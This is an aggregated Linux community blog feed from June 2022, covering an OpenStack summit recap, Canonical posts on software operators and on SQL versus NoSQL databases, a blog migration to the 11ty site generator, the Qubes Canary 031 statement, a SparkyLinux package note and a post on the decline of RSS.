During my keynote on Day 1, I discussed the fact that OpenStack has just entered the Slope of Enlightenment phase of its Hype Cycle.  Most organisations have realised that OpenStack and Kubernetes are in fact complementary technologies rather than competing ones. Canonical happens to be well-positioned, as Ubuntu is a platform that integrates OpenStack, Kubernetes and applications very well.

To prove this, we presented four recent case studies from customers who have adopted an Ubuntu-based infrastructure, including OpenStack and Kubernetes. Their use cases include:

We see OpenStack adoption continuing to grow.


OpenStack public clouds

Whoever passed through the marketplace at the venue couldn’t miss the booths of public cloud providers. It was super exciting to see all of those companies who have successfully built their own local public cloud infrastructure on OpenStack. Many of them are now extending their offering to other parts of the world, effectively competing with hyperscalers – or preparing to compete.

According to Mark Collier’s keynote, there are now 180+ public cloud providers all over the world who use OpenStack as a platform for cloud infrastructure implementation. 

Together, these companies account for 27% of the cloud market. During one of the lightning talks, Canonical talked about seven reasons to become a business like that, especially from the mobile operator perspective.

Learn more about public cloud implementation on Ubuntu >

Composable infrastructure

Composable infrastructure was definitely another main trend of the summit. It was introduced by Toby Owen from Fungible and explored in more detail throughout the rest of the week. Composable infrastructure assumes that more and more functions are moved away from the traditional x86 processor architecture into SmartNICs and data processing units (DPUs), leaving hypervisors as a pure set of compute resources for cloud workloads. During the OpenStack Yoga development cycle, our team at Canonical delivered open virtual network (OVN) offloading capabilities in OpenStack Neutron, moving network services down to SmartNICs and DPUs.

Read OpenStack Yoga release notes > 


Sustainable computing

Stuart Grace from BBC delivered an insightful keynote on sustainable computing.  His session, titled “Building Environmental Dashboards for OpenStack at BBC R&D”, showed how combining real-time data from electricity producers with metrics from OpenStack hypervisors helps BBC  monitor and eventually reduce the environmental impact of various workloads. This story fits very well with a global trend around minimising carbon emissions generated by data centres and the overall trend towards sustainable computing.

Watch an OpenInfra Live episode about sustainable computing >

OpenStack Ops Meetup

On the day after the summit, Deutsche Telekom hosted an OpenStack Ops Meetup to discuss various challenges centred around running OpenStack in production. The topics included OpenStack for VMs and containers, Ceph for storage and common issues with OpenStack operations, as well as upgrades and the variety of tools available to tame the complexity of OpenStack.

All summit sessions

All summit sessions, including those delivered by Canonical, have been recorded and will be available on demand. Visit the OpenInfra website and the OpenInfra YouTube channel for the latest updates.


OpenInfra Summit Vancouver 2023

The next OpenInfra Summit will take place in Vancouver, BC, from 13 to 15 June 2023. No further details are available yet, but they are coming to the OpenInfra website soon. Book those dates in your calendar and let’s see each other in Vancouver again!

Contact Canonical if you have any questions regarding OpenStack, open infrastructure or any other trends discussed at the summit.

14 June, 2022 07:49AM

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 739

Welcome to the Ubuntu Weekly Newsletter, Issue 739 for the week of June 5 – 11, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

14 June, 2022 12:02AM by guiverc

June 12, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: The Software Operator Design Pattern: May the force be with you – Part 3

The software operator is a design pattern. A design pattern describes the approach to cover the operational tasks of an application’s implementation. The first post in this series introduced the concept of a design pattern in general. The second post covers the software operator design pattern in particular.

In the second part, we also explained that a design pattern usually covers a discussion of its consequences, advantages and disadvantages. After all, a “pattern” refers to an approach that has been applied multiple times. This experience should therefore be written down to help software developers make informed decisions about which design to apply.


Design forces impact the eventual solution design and may lead to the evaluation of multiple paths until the final solution is reached (photo credit: Marko Blažević)

This third installment in our series discusses the so-called design forces which motivate the pattern. A discussion of design forces in general can be found in early books about software patterns, such as Design Patterns: Elements of Reusable Object-Oriented Software and the POSA series (Pattern-Oriented Software Architecture).

What is a design force?

In software development, design forces are characteristics of a use case which eventually impact a solution’s design. A very simple example is a bound on execution time in a use case for sorting data: sorting approaches that would result in overly long runtimes are ruled out. Strictly speaking, an algorithm is not a design; a design is about the structural arrangement of elements and their interaction. But this example shows that forces can refer to non-functional requirements.


An implementation of a design pattern can have many facets – just like the Rubik’s cube shot by Dev Asangbam

Forces that impact software operator design

The concept of forces in a design pattern refers to characteristics of concrete use cases and how these favor a particular design. Software operator patterns are usually applied to distributed systems, remote execution, cloud-native deployments and server software involving scalability and high user load – to name a few. Let’s consider some of these examples in more detail:

  • Remote execution: Decades ago, servers used to have a display with mouse and keyboards attached for people to work on the operational tasks. Today, operating applications is a remote task.
  • Flexible Operations:  Server applications in growing businesses, regardless if they are customer-facing or not, should be able to adapt to changing demands. Applications must scale up but also down to save resources. Changes in the environment lead to changes in the configuration and any solution needs to be easy to adapt. A software operator must support this flexibility and must not add significant restrictions to the operational capabilities of the application.
  • Application Composition: Server applications are usually composed applications. Simple applications, like those used for productivity on personal computers, do not impose much demand on operations. It is rather server applications, composed of several elements (web servers, proxy servers, caches, data stores, message brokers), that create a particular challenge for operators. Managing multiple application parts at once creates complexity and hassle.

These three points are the main forces behind the software operator design pattern: distributed and remote execution, flexible operations and a composed setup. There are more forces, of course; cyber security and reliability also deserve mention, because the work of many people depends on an application being operated properly, which makes reliable and secure operations equally important.

Look out for part 4

With the forces pointed out, the next part of this series will delve into the advantages of the software operator design pattern.

Further reading

Learn more about Juju and the Juju SDK – our implementation of the software operator design pattern: https://juju.is/docs/sdk

12 June, 2022 09:25PM

Oli Warner: Turning my sites up to Eleven-ty

This site is now powered by a static site generator called 11ty. It’s awesome! I’ll try to explain some of my favourite things about it and reasons you might prefer it to stalwarts in the SSG arena.

Volume knob that goes to 11

15 years ago, training up on Django, I built a blog. It’s what webdevs did back then. It was much faster than Wordpress but the editing always fell short and the database design got in the way more than it helped. Dogfooding your software means every problem is yours. I had a glossy coat but the jelly and chunks arrested my writing process.

SSGs are perfect for blogs and brochure websites

Static site generators churn content through templates into a static website that you can just upload to a simple webserver. This is unlike Django or any other dynamic language, where you host a running process and database on an expensive server 24/7 to generate HTML on demand. You’re just serving files, for free.

Most sites don’t need fresh HTML for every request. They don’t change often enough. A blog or a business’ brochure website might get updates anywhere from a couple of times a day to only once or twice a year. With a static site generator, you can make your edits and regenerate the site.

It’s also secure. There’s nothing to hack running on my domain like there might be in a Wordpress install. There’s no database to run injection attacks against. There’s no indication where the source is hosted. For me, Cloudflare assumes much of the liability there.

I’ve used a few SSGs professionally: Jekyll, Hugo and Nuxt.

Why pick 11ty over those?

11ty logo

Jekyll is glacial on Cloudflare’s CI/CD environment; about 3 minutes a build. Hugo is Fast but can be a nightmare to work with when things go wrong. Absolutely user-error, but I’ve wasted days at a time banging my head on Hugo. Both Jekyll and Hugo being non-JS options have their own take on asset management. I’m also a Vue developer so Nuxt is great for me, but force-feeding users a bundle of Vue, Nuxt and routers and whatnot, just for a blog? It’s silly. It does have top-shelf asset management though.

11ty was a perfect balance between Hugo and Nuxt. I get all my favourite frontend tools (PostCSS, PurgeCSS on here) with a generator that isn’t trying to force-feed my users a massive script bundle.

More, I get to pick the markup language I write in. I can use Markdown, Liquid, Handlebars, Nunjucks, Moustache, and many, many more. Even plain old HTML, or a mix. I can bundle images with the blog posts (like Hugo leaf bundles). I can paint extra styles on the page if I want to.

I have freedom. I can do anything, on any page.

It’s been 3 weeks, 2 days since my initial commit on this site’s repo and since finishing the conversion I’ve written more posts than I did in the previous decade, and I’ve also converted two Jekyll sites over too. Each took about an afternoon. Perfect URL parity, nothing ostensibly different, just a [much] better toolchain.

What took longest was editing and upgrading 285 blog posts, spanning back to the early Naughties.

Fast Enough™ for developers

Build performance only matters to a point. On this seven year old laptop, 11ty generates this whole blog, 400 pages, in well under two seconds:

Copied 403 files / Wrote 539 files in 1.46 seconds (2.7ms each, v1.0.1)

It’s a second faster on my desktop, and on a real 23 page brochure website, it’s only 0.3s.

11ty is fast but whatever I use only has to be faster than me switching to my browser. Hugo is insanely fast but so what? Anything less than 2 seconds is Fast Enough™. That’s what I mean.

No added bloat for visitors

Many Javascript-based SSGs bundle in client code too. Sometimes this makes sense: You might use Next and Nuxt to build component rich SPAs, but for blogging and brochure stuff, an extraneous 100KB of swarf delivers a poor user experience.

This may explain why I’ve actively sought out non-JS SSGs like Jekyll and Hugo before.

11ty is one of the few JS SSGs that doesn’t force script on your users. If you want “pure” HTML, that’s what you’ll get. If you’re economical with your CSS, images and fonts, it’s easy to juice the performance stats.

100% on Pagespeed

Comes with batteries…

You don’t have to pick between Markdown and Pug, Liquid or Nunjucks. You get them all, and more. Frontmatter can be in YAML, TOML, HAML, JSON, even build-time JavaScript. So what? So what?! You wouldn’t say that if you’d ever wasted a day trying to work out what the hell a Hugo site was doing because of a typo in a template whose syntax was so thick and unwelcoming, kings built castle walls with it.

11ty is simple and flexible.

There’s also a huge pile of community 11ty plugins too.

… But you can use your own

If you don’t get on with something in 11ty, you can use something else, or rip it out and do your own thing.

The Eureka moment for me was when I got into a fight with the markdown engine. I wanted to extend it to handle some of the custom things I did in my old blog posts, that I’d implemented in Django. Code to generate Youtube embeds, special floats, <aside> sidebars, etc. It would have been a nightmare to upgrade every post.

Using markdown-it and markdown-it-container I completely replaced the Markdown engine with something I could hack on. Here’s a real “explainer” snippet I have and use:
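The idea behind such a container is turning a fenced block in the Markdown into wrapping HTML. Here is a minimal, self-contained sketch of that transformation (the `::: explainer` fence syntax and the class name are assumptions for illustration; the site itself does this through the markdown-it-container plugin during parsing, not with a regex):

```javascript
// Sketch of what a custom "explainer" container does: turn a
// ::: explainer ... ::: fence into a wrapping HTML element.
// (Hypothetical syntax and class name; markdown-it-container does
// the real parsing in an actual 11ty setup.)
function renderExplainers(markdown) {
  return markdown.replace(
    /^::: explainer\n([\s\S]*?)\n:::$/gm,
    (_, body) => `<aside class="explainer">\n${body}\n</aside>`
  );
}

const input = "Intro paragraph.\n::: explainer\nThis bit explains a term.\n:::";
console.log(renderExplainers(input));
```

The plugin approach does the same job inside markdown-it’s token pass, which composes better with the rest of the pipeline than post-processing the rendered HTML.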

It’s important to stress that neither of those projects are for 11ty. They’re just two of a million projects sitting on npm for anyone to use. 11ty just makes it easy to use any of this stuff on your pages.

Adding template-filters for all the bundled template languages is also made really simple:

eleventyConfig.addFilter("striptags", v => v.replace(/(<([^>]+)>)/gi, ""))
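That filter body is just a plain function, so it can be sanity-checked outside 11ty, for example:

```javascript
// The same strip-tags regex as above, exercised as a standalone function.
const striptags = (v) => v.replace(/(<([^>]+)>)/gi, "");

console.log(striptags("<p>Hello <em>world</em></p>")); // "Hello world"
```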

If you’ve ever used opinionated software before —perhaps even your own— you’ll appreciate that 11ty isn’t just getting out of your way, it’s going out of its way to make your life easy.

What’s not so good?

I’m three sites into 11ty now, I’ve seen how I work with it and I’ve bumped into a few things I’m not gushing about:

  • Pagination is good and frustrating in equal measure. Collections seem like a good idea, filtering them into new collections is easy enough, but actually paginating them can be a bit of a mess. To show a tag page, for example, you actually use pagination to filter the collection to that tag. But then you can’t [easily] re-paginate that data, so I just show all posts from that tag rather than 15.

    If I had hundreds of posts in any one tag, this’d be a problem.

  • For all my complaints with Jekyll and Hugo’s wonky asset pipelines, 11ty’s is completely decoupled.

    I use eleventy-plugin-postcss to call PostCSS at roughly the right time (and update on changes) but I could just as easily handle that externally. There’s nothing in 11ty (obvious to me anyway) to ingest that back into the templates.

    • You can’t easily inline classes that only get used on one page.
    • You can’t easily hash the filenames and update the links that call them after generating the post HTML (that’s important with PurgeCSS).
    • Media handling could be tighter. The Image plugin is official, but this should be part of the project IMO, and not rely on this hairy shortcode.

    It’s important to stress that I’m using 11ty in order that I don’t need bundles, but some of these complaints would be assuaged if the system could parse bundle manifests, so I could use external tools rather than just dumb static assets, and have the right filenames pulled in (at the right time).

  • A scoped include like Django’s would solve a couple of problems I’ve hacked around:

    {% include 'template' with variable=value %}

    Saneef points out that this is possible by leveraging the macro functions in Nunjucks. It’s a bit of a mouthful. I’d prefer a first-party solution (which I guess would actually have to come as part of Nunjucks), but again it’s interesting to see just how flexible this thing is.

  • Named/keyword arguments in shortcodes would also be nice, so I don’t have to provide every option to just use the last, but I guess this would require some thinking to overcome the lack of support for destructured parameters in ES6.

These are small complaints, maybe already with solutions I’ve just not seen yet.

I’ve still managed to transfer three sites to 11ty in a couple of weeks and I wouldn’t have done that if I didn’t think it worked well enough. I’m really happy with 11ty. I’d heartily recommend it to anyone.

12 June, 2022 12:00AM

hackergotchi for Qubes

Qubes

Qubes Canary 031

We have published Qubes Canary 031. The text of this canary is reproduced below.

This canary and its accompanying signatures will always be available in the Qubes security pack (qubes-secpack).

View Qubes Canary 031 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/canaries/canary-031-2022.txt

Learn how to obtain and authenticate the qubes-secpack and all the signatures it contains:

https://www.qubes-os.org/security/pack/

View all past canaries:

https://www.qubes-os.org/security/canary/


                    ---===[ Qubes Canary 031 ]===---


Statements
-----------

The Qubes security team members who have digitally signed this file [1]
state the following:

1. The date of issue of this canary is June 11, 2022.

2. There have been 80 Qubes security bulletins published so far.

3. The Qubes Master Signing Key fingerprint is:

       427F 11FD 0FAA 4B08 0123  F01C DDFA 1A3E 3687 9494

4. No warrants have ever been served to us with regard to the Qubes OS
   Project (e.g. to hand out the private signing keys or to introduce
   backdoors).

5. We plan to publish the next of these canary statements in the first
   fourteen days of September 2022. Special note should be taken if no new
   canary is published by that time or if the list of statements changes
   without plausible explanation.


Special announcements
----------------------

None.


Disclaimers and notes
----------------------

We would like to remind you that Qubes OS has been designed under the
assumption that all relevant infrastructure is permanently compromised.
This means that we assume NO trust in any of the servers or services
which host or provide any Qubes-related data, in particular, software
updates, source code repositories, and Qubes ISO downloads.

This canary scheme is not infallible. Although signing the declaration
makes it very difficult for a third party to produce arbitrary
declarations, it does not prevent them from using force or other means,
like blackmail or compromising the signers' laptops, to coerce us to
produce false declarations.

The proof of freshness provided below serves to demonstrate that this
canary could not have been created prior to the date stated. It shows
that a series of canaries was not created in advance.

This declaration is merely a best effort and is provided without any
guarantee or warranty. It is not legally binding in any way to anybody.
None of the signers should be ever held legally responsible for any of
the statements made here.


Proof of freshness
-------------------

Sat, 11 Jun 2022 16:02:15 +0000

Source: DER SPIEGEL - International (https://www.spiegel.de/international/index.rss)
The Artillery War in the Donbas: Ukraine Relying Heavily on Heavy Weapons from the West
Ongoing Dependence on Russian Energy: The Natural Gas Continues to Flow
Europe's Top Prosecutor Brings In More Money than She Spends
The Courageous Women of Kabul: Standing Up to the Taliban's Burqa Decree
Kremlin Threats: Europe Has To Learn To Defend Itself, But How?

Source: NYT > World News (https://rss.nytimes.com/services/xml/rss/nyt/World.xml)
‘We Buried Him and Kept Walking’: Children Die as Somalis Flee Hunger
Rumbling Through Modern Jordan, a Railway From the Past
McDonald’s Is Reinvented in Russia as the Economy Stumbles On
Newly United, French Left Hopes to Counter President in Upcoming Vote
Recording India’s Linguistic Riches as Leaders Push Hindi as Nation’s Tongue

Source: BBC News - World (https://feeds.bbci.co.uk/news/world/rss.xml)
Russia hands out passports in occupied Ukraine cities
Putin and Peter the Great: Russian leader likens himself to 18th Century tsar
China warns Taiwan independence would trigger war
Qatar World Cup 2022: German ex-football star says host's treatment of gay people is unacceptable
China: Footage of women attacked in restaurant sparks outrage

Source: Blockchain.info
000000000000000000032e9b82971c2ef2eb1362c65e01f1db5f60fa81fd5eef


Footnotes
----------

[1] This file should be signed in two ways: (1) via detached PGP
signatures by each of the signers, distributed together with this canary
in the qubes-secpack.git repo, and (2) via digital signatures on the
corresponding qubes-secpack.git repo tags. [2]

[2] Don't just trust the contents of this file blindly! Verify the
digital signatures! Instructions for doing so are documented here:
https://www.qubes-os.org/security/pack/

--
The Qubes Security Team
https://www.qubes-os.org/security/

12 June, 2022 12:00AM

June 11, 2022

hackergotchi for SparkyLinux

SparkyLinux

NotepadNext

There is a new application available for Sparkers: NotepadNext

What is NotepadNext?

A cross-platform reimplementation of Notepad++. Notepad Next is yet another text and source code editor.

Installation (Sparky 6 & 7 amd64):

sudo apt update
sudo apt install notepadnext

License: GNU GPL 3
Web: github.com/dail8859/NotepadNext

 

11 June, 2022 07:32PM by pavroo

June 10, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: What is NoSQL and what are database operators?

In the previous blog, SQL vs NoSQL Database, we discussed the difference between two major database categories. In a nutshell, the main difference between NoSQL and SQL is that NoSQL adopts a ‘right tool for the job’ approach, whilst SQL adopts a ‘one tool for all the jobs’.

While SQL remains a standard in organisations worldwide, many other database systems have recently emerged. This is mainly due to the rising volume of highly varied data, scalability, changing storage requirements, the need for high processing power, low latency, and evolving requirements in analytics that database applications have to cater to. NoSQL is a class of newer database systems that offer alternatives to traditional RDBMSs and cater for one or more of these specialised needs.


What does NoSQL mean?

NoSQL stands for “not only SQL” rather than “no SQL”. NoSQL databases aim to build flexible schemas and specific data models. Typically, these databases are built for the web or for scenarios where traditional relational databases can have limitations. NoSQL databases can be quicker to develop applications with, can offer more flexibility and scale; and they often offer excellent performance due to their specialised nature.

Why use NoSQL?

NoSQL databases are widely recognised for their ease of development, functionality, and performance at scale. Multiple NoSQL databases have different characteristics and purposes. However, they share fundamental elements:

  • Developer friendliness
  • Can store various data types (structured, unstructured and semi-structured)
  • Can update schemas and fields easily
  • Specialised to solve specific use cases
  • Can scale horizontally in some databases such as MongoDB, OpenSearch, etc.
  • Some NoSQL communities benefit from open systems and concerted commitment to onboarding users. 
  • There are also multiple proprietary NoSQL services that organisations can use. 

NoSQL database examples

There are multiple types of NoSQL databases, such as document databases, key-value stores, wide-column databases, and graph databases.

  • Document databases are primarily built for storing document-like information, including JSON. Examples are MongoDB, Couchbase, Elasticsearch, and OpenSearch.
  • Key-value databases store data in a “key-value” format and optimise it for reading and writing; Redis is one example.
  • Wide-column databases use the tabular format of relational databases while allowing wide variance in how data is named and formatted in each row, even within the same table. Cassandra is one example.
  • Graph databases use graph structures to define the relationships between stored data points, such as Neo4j.
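To make the distinctions concrete, here is one way the same logical record might be shaped for each model, sketched as plain JavaScript data structures (all field and key names are invented for illustration):

```javascript
// The same logical "user" record, shaped for each NoSQL data model.
// (Illustrative only; field and key names are made up.)

// Document (e.g. MongoDB): one self-contained JSON document.
const userDoc = { _id: "u42", name: "Ada", tags: ["admin", "beta"] };

// Key-value (e.g. Redis): opaque values behind string keys.
const kvStore = new Map([
  ["user:u42:name", "Ada"],
  ["user:u42:tags", "admin,beta"],
]);

// Wide-column (e.g. Cassandra): a row key plus a dynamic set of columns.
const wideRow = {
  rowKey: "u42",
  columns: { name: "Ada", "tag:admin": 1, "tag:beta": 1 },
};

// Graph (e.g. Neo4j): nodes and edges carrying the relationships.
const graph = {
  nodes: [{ id: "u42", label: "User" }, { id: "g1", label: "Group" }],
  edges: [{ from: "u42", to: "g1", type: "MEMBER_OF" }],
};

console.log(kvStore.get("user:u42:name")); // "Ada"
```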

What are database operators?

The databases mentioned in the previous section must be managed and operated in the production environment. This means that database administrators and analysts who run workloads in various infrastructures should be able to automate tasks to take care of repeatable operational work. An operator can be used to manage the database applications.

An operator is an application containing the code and knowledge needed to automate the management of a database. Below is a list of features that an operator should enable so databases can be managed and operated appropriately in any environment.

Operators for database high availability 

The database should be highly available, as this is usually critical for the organisation’s continuity. High availability (HA) is a system characteristic that aims to ensure an agreed level of operational performance, typically uptime, over a given period.

Operators ensure that the defined Recovery Point Objective (RPO) and Recovery Time Objective (RTO) are achieved. The strategy should include automatic failover without data loss, switching traffic from the old primary to the new one; automated recovery from single-member and full-cluster crashes; cross-region and/or cross-cluster replication; health and readiness checks; and more.

Security set-up enabled by operators

A database can hold confidential, sensitive, or protected information, making it a prime target for cyberattacks. Therefore, basic security requirements such as user authentication and authorisation are essential, and operators should enable them by default. In addition, semi-automatic updates, network security, encryption in transit and encryption at rest can be implemented.

Operators for deployment

Deployment readiness is also vital for databases in production. An automated deployment setup provided by operators helps organisations improve the customer experience and mitigate operational risks. There are multiple considerations here: schema setup, vertical and horizontal scalability, the ability to deploy air-gapped, database plugins, customisation and configuration of the database, support for multiple database versions, support for multiple storage systems, and many more.

Backup and restore implementation

Here is a list of what operators should do to enable backup and restore:

  • Backup to another region
  • Backup compression
  • Backup encryption with external encryption key storing
  • Partial restoration
  • Consistent backup of multi-shard clusters
  • Point-in-Time Recovery – the ability to recover to any transaction

Operators enable monitoring

A production database should be monitored appropriately. This can be implemented with logs, query analytics, and host and database metrics. In addition, appropriate alerting rules and notification channels must be in place. An operator can simplify and automate enabling these monitoring capabilities for databases.
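At their core, the capabilities above come down to the same loop: observe the actual state of the database, compare it with the desired state, and act on the difference. A toy sketch of that reconcile step follows (the state shape is invented for illustration; real operators such as Juju charms are event-driven rather than polling like this):

```javascript
// Minimal sketch of the reconcile step at the heart of an operator:
// compare desired state with observed state and emit corrective actions.
// (Hypothetical state shape; illustrative only.)
function reconcile(desired, observed) {
  const actions = [];
  if (observed.replicas < desired.replicas) {
    actions.push({ op: "scale-up", count: desired.replicas - observed.replicas });
  }
  if (observed.version !== desired.version) {
    actions.push({ op: "upgrade", to: desired.version });
  }
  return actions;
}

// A cluster that is one member short and a version behind:
console.log(reconcile(
  { replicas: 3, version: "5.0" },
  { replicas: 2, version: "4.4" }
));
```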

Canonical Charmed NoSQL database operator

Canonical has developed its own database operators, known as charms. Charms are application packages with all the operational knowledge required to install, maintain and upgrade an application. Charms can integrate with other applications and charms. 

Charmhub.io has published multiple database charms that can run in Kubernetes, Virtual Machines (VMs), public, private and hybrid clouds. Explore the available NoSQL open source charms below:

Deploy Redis using Charmhub – The Open Operator Collection

Deploy Cassandra using Charmhub – The Open Operator Collection

Deploy MongoDB using Charmhub – The Open Operator Collection

Conclusion

Building and running massively interactive applications has created new technology requirements. This includes requirements on agility, real-time data management, and data variability. Unfortunately, SQL cannot meet these new requirements. Enterprises need to turn to NoSQL database technology.

NoSQL technologies support various data models: document, wide-column, key-value, graph, and search. This makes these databases suitable for addressing multiple use cases.

These databases need to be managed and operated in the production environment, and an operator is an excellent tool to automate tasks for analysts, administrators and engineers.

10 June, 2022 06:38PM

Ubuntu Blog: SQL vs NoSQL: Choosing your database


IT leaders, engineers, and developers must consider multiple factors when using a database. There are scores of open source and proprietary databases available, and each offers distinct value to organisations. They can be divided into two primary categories: SQL (relational database) and NoSQL (non-relational database). This article will explore the difference between SQL and NoSQL and which option is best for your use case.

Defining SQL

Many IT decision-makers, developers and analysts are familiar with the Relational Database Management System (RDBMS) and the Structured Query Language (SQL). The SQL database language emerged back in 1970. Its primary focus was to reduce system data duplication by creating data structures and schemas.

While SQL remains a standard in organisations worldwide, we see many other database systems emerging. This is mainly due to the rising volume of unstructured data, changing storage requirements, the need for high processing power, and evolving requirements in analytics that database applications have to cater to. NoSQL is one of these newer database systems.

Defining NoSQL

The main difference between NoSQL and SQL is that NoSQL adopts a ‘right tool for the job’ approach, whilst SQL adopts a ‘one tool for all the jobs’. This is why NoSQL has become the popular database category as an alternative to traditional RDBMSs.

NoSQL was developed in the late 2000s. NoSQL stands for “not only SQL” rather than “no SQL”. This database category aims to build flexible schemas and specific data models. Typically, these databases are built for the web or for scenarios where traditional relational databases can have limitations. NoSQL databases can be quicker to develop applications with, can offer more flexibility and scale; and they often offer excellent performance due to their specialised nature.

SQL vs NoSQL

To make informed decisions about which database type to use, practitioners should know the differences between SQL and NoSQL. The table below describes their differences in terms of database structure, storage model, scalability, properties, support, and communities.

Category | SQL | NoSQL
--- | --- | ---
Database structure | Relational database; has a predefined schema for structured data | Non-relational database; has dynamic schemas for unstructured data
Data storage model | Table-based with fixed rows and columns | Document: JSON documents. Key-value: key-value pairs. Wide-column: tables with rows and dynamic columns. Graph: nodes and edges. Search: search engine daemon
Example databases | MySQL, PostgreSQL | Document: MongoDB. Key-value: Redis. Wide-column: Cassandra. Graph: Neo4j. Search: OpenSearch
Scalability | Most SQL databases can be scaled vertically, by increasing the processing power of existing hardware. | Some NoSQL databases use a master-slave architecture which scales better horizontally, with additional servers or nodes.
Support and communities | SQL databases represent massive communities, stable codebases, and proven standards. SQL languages are mostly proprietary or associated with large, single vendors. | Some NoSQL technologies are being adopted quickly, but communities are smaller and more fractured. Some NoSQL communities benefit from open systems and a concerted commitment to onboarding users. There are also multiple proprietary NoSQL services that organisations can use.
Properties | RDBMSs must exhibit the four “ACID” properties: Atomicity, Consistency, Isolation, Durability. | NoSQL databases adhere to the CAP theorem: only 2 of the 3 properties (Consistency, Availability, Partition tolerance) can be guaranteed.

When to use SQL and NoSQL in your organisation

SQL can be used for big data, but NoSQL handles much bigger data by nature. SQL is also good to use when data is conceptually modelled as tabular. It’s recommended for systems where consistency is critical. Some of the possible use cases for SQL are managing data for e-commerce applications, inventory management, payroll, customer data, etc.

NoSQL databases are categorised into different structures, and they can be a document database, key-value, wide column, graph and search. Each type has its strong properties that fit specific use cases, such as:

  • Document: a general-purpose database for web applications, mobile applications and social networks.  
  • Key-value: large amounts of data with simple lookup queries. The most common use case is caching. Memcached is one example. It is an in-memory key-value object-store. MediaWiki uses it for caching values. It reduces the need to perform expensive computations and the load on database servers.
  • Wide-column: large amounts of data with predictable query patterns. An excellent example is an inventory management system that supports critical use cases and applications that need real-time analytics capabilities.
  • Graph: analysing and traversing relationships between corresponding data, which is suitable for use cases like fraud detection & analytics, recommendation engine, and social media and social network graphs.
  • Search: this is good for application search, log analytics, data observability, data ingestion, etc.
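The caching use case mentioned for key-value stores can be illustrated with a toy in-memory store with per-entry expiry, a stand-in for what Memcached or Redis provide (the names and the lazy-expiry strategy below are illustrative, not how either system is actually implemented):

```javascript
// Toy in-memory key-value cache with per-entry TTL, sketching the
// model Memcached and Redis offer. (Illustrative only.)
class TtlCache {
  constructor() { this.entries = new Map(); }
  set(key, value, ttlMs) {
    this.entries.set(key, { value, expiresAt: Date.now() + ttlMs });
  }
  get(key) {
    const entry = this.entries.get(key);
    if (!entry) return undefined;
    if (Date.now() > entry.expiresAt) { // lazy expiry: evict on read
      this.entries.delete(key);
      return undefined;
    }
    return entry.value;
  }
}

const cache = new TtlCache();
cache.set("page:/home", "<html>ok</html>", 60000); // cache for one minute
console.log(cache.get("page:/home")); // "<html>ok</html>" while fresh
```

Real systems add eviction policies (e.g. LRU when memory is full) on top of simple expiry, but the lookup model stays the same: a single key maps to an opaque value.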

Conclusion

The criteria above provide a helpful rubric for database administrators, analysts and architects to make informed decisions about SQL and NoSQL. Consider critical data needs and acceptable trade-offs in properties, data structure, performance, and communities when evaluating both options.

Canonical’s database offering

Canonical can offer support and managed services for both NoSQL and SQL databases such as MySQL, Postgres, Redis, Cassandra and MongoDB. 

10 June, 2022 06:38PM

Oli Warner: Wait! What happened to RSS?!

While I was busy aging like soft cheese, someone killed-off* RSS.

It used to be everywhere, now it’s gone; hidden or dead. How do you kids stay up to date with the websites you like? Do you know what RSS does? How are websites supposed to advertise update-subscriptions?

Really Simple Syndication was invented in the Cretaceous period, roughly 100 million years ago. It enabled websites’ fans to get updates, quickly and easily. It got used for everything else too and remains a fundamental part of podcasting, but in the explosion of Web 2.0, it was a very serious part of websites keeping in touch with their user-bases.

I recently restored the Subscribe Icon back to the main navigation here when it started to dawn on me…

Do you kids know what to do with RSS?

Once upon a time, when you clicked a link to an RSS feed, you’d see an option to do something with it: save a live bookmark in Firefox, or add it to Google Reader. Both long dead. There are still a clutch of other readers today, but the automated handling of this, and browsers’ willingness to handle it, seems to have evaporated, leaving novices in the lurch.

If you click a link to my main feed, your browser might pretty-format the XML code but that’s all the help you get. Update: The raw RSS is now styled via XSLT so it does at least look better than a page of XML. More at the end.

You still need to plumb that URL into something. And that relies on you knowing what it is. So straw poll, please. If you don’t know anything about RSS, let this old doughnut know and I’ll stop pushing it. Ideally you’ll also have an answer to my next question…

How do you subscribe to websites in 2022?

I’m people so I’ll go first: I still use RSS. I use Feedly to get updates from about a hundred websites, and Hacker News, and I’m happy with my wash. This is how it’s been for a decade.

That’s where my consternation originated. Do people just consume what they’re now fed through Platforms: Facebook, Twitter and Tiktok? Would I have to hawk myself on each platform? I’m concerned that’s just feeding the problem. It’s not even apparent how websites are doing this either now. I know I’ve hacked together a few feed generators for websites without RSS, just so I can get updates.

I want to know how you handle updates. Please tell me in the comments or by email.

Why are Google, Microsoft and Apple so inactive here?

It’s super easy to blame “The Rise of Platforms”, but hard to ignore that the big desktop and mobile operating systems have done nothing to help. Browser vendors washed their hands of RSS. What’s especially galling is these companies run personalised news aggregation services, but none lets you add your own feeds. I’d think that each of them has a vested interest in reining back control of web consumption. Maybe the EU can mandate RSS support.

I don’t have a high note to end on here. I stopped paying attention and the world changed on me, and I can’t figure out why. I just feel old.

Update: Teach people what your RSS feed is with XSLT

My biggest single complaint was that linking to a wall of XML would just confuse people. I don’t think we’ll convince any browser vendors to give us back RSS support in the short term, but XSLT came up a few times in your comments here, emails, and comments on Hacker News. Big thanks. XSLT is a templating and styling language for XML and it has good browser support.

With it you can transform an RSS feed into something that looks like a normal web page. And explain what to do next, if they don’t already know. My XSLT is super-simple, please have a look. I’ve dropped in a message explaining what RSS is, that you need an aggregator. It might be nice to offer email subscriptions from here directly one day.

* Is RSS really “dead” if you’re still using it?

A few people took exception with my leading claim that RSS seems dead. They’re still using it. You’re still using it. Bloody hell, I just said I’m still using it. How could it be dead?

Latin is a dead language. People who make a special effort still understand it, and some even use it, and there’s plenty evidence it existed, scattered through modern languages… But as soon as the Roman Empire fell, and the Western Empire rotted away, around 400AD, poor education meant Latin died off rapidly. Without the central push and steering, local languages took over.

